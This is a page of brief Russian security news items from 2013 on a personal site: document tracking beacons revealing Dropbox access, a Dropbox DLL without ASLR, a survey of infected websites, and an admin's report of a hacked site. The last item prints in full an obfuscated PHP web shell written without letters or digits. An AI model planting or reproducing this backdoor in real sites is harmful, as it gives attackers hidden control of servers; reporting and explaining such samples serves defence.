Vayrus Home Page Четверг, 25.04.2024, 10:03
Главная | Регистрация | Вход Приветствую Вас Гость | RSS
Меню сайта

Мини-чат

Главная » 2013 » Сентябрь » 17

Не секрет, что в документы MS Office или PDF можно вставить специальные следящие скрипты для проверки, с какого IP открыли файл, в какое время и т.д. Такими средствами давно пользуются маркетологи. Каждый раз при открытии файла документ отправляет GET-запрос на удаленный сервер, где регистрируется это событие. Среди прочих, возможность внедрения следящих скриптов предлагает сервис HoneyDocs.

Один из пользователей HoneyDocs внедрил скрипт в файл passwords.doc — и закачал его в свою личную папку Dropbox. Каково же было его удивление, когда через 10 минут на сервере появилось сообщение, что файл открыт. Ведь он еще ни с кем не делился ссылкой, да и вообще закачал файл в персональную папку, к которой запрещен посторонний доступ.

Пользователь продолжил свой эксперимент. Он удалил файл и закачал его повторно. В этот раз посторонних посещений не было, но они были ... Читать дальше »

Просмотров: 557 | Добавил: vayrus | Дата: 17.09.2013

Специалист по безопасности и пользователь программы Dropbox Грэм Сазерленд (Graham Sutherland) обнаружил уязвимость в клиентском приложении Dropbox под Windows (32 бит).

128-килобайтная библиотека DropboxExt19.dll загружается в память, внедряясь в различные процессы, чтобы обеспечить контекстную функциональность, в том числе вызываемую по щелчку правой кнопки мыши.

Среди прочего, она внедряется также в firefox.exe и другие процессы.

Но самое интересное, что эта библиотека не использует технологию рандомизации памяти ASLR (Address space layout randomization).

ASLR — один из главных механизмов защиты операционной системы Windows от запуска различных эксплойтов, в том числе с переполнением буфера. Как показывает практика с последними браузерным ... Читать дальше »

Просмотров: 632 | Добавил: vayrus | Дата: 17.09.2013

Компания Sucuri осуществила проверку миллиона крупнейших сайтов интернета (по версии Alexa) на предмет уязвимостей, устаревшего серверного ПО и зловредов. Результаты плачевны.

Из миллиона сайтов 108 781 признаны небезопасными, а 18 557 из них уже внесены в черные списки антивирусных компаний и поисковых систем. На диаграмме можно увидеть, что самая большая в мире база зараженных сайтов — у McAffee, на втором месте Sucuri Labs, а на третьем — российский «Яндекс», далее следуют Norton, ESET и Google. База вредоносных сайтов «Яндекса» по этой выборке примерно в шесть раз полнее, чем у Google: 2154 штуки против 357.

Еще 4836 сайтов из миллиона заражены поисковым спамом — самым популярным методом инъекций.

Пугающе много сайтов (67 509) работают под устаревшим и уя ... Читать дальше »

Просмотров: 554 | Добавил: vayrus | Дата: 17.09.2013

Администратор одного из веб-сайтов жалуется, что его сайт подвергся взлому. Он обнаружил PHP-шелл, в коде которого не было ни одной буквы или цифры.

@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Админ просит объяснить, что это такое. Специалисты компании Sucuri объясняют, что суть бэкдоров в максимальной скрытности, поэтому их авторы часто прибегают к необычным методам обфускации. Например, первая строчка @$_[] ... Читать дальше »

Просмотров: 676 | Добавил: vayrus | Дата: 17.09.2013

Форма входа

Календарь новостей
«  Сентябрь 2013  »
ПнВтСрЧтПтСбВс
      1
2345678
9101112131415
16171819202122
23242526272829
30

Поиск

Друзья сайта

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

Copyright ArtStudio Software © 2024 Конструктор сайтов - uCoz -->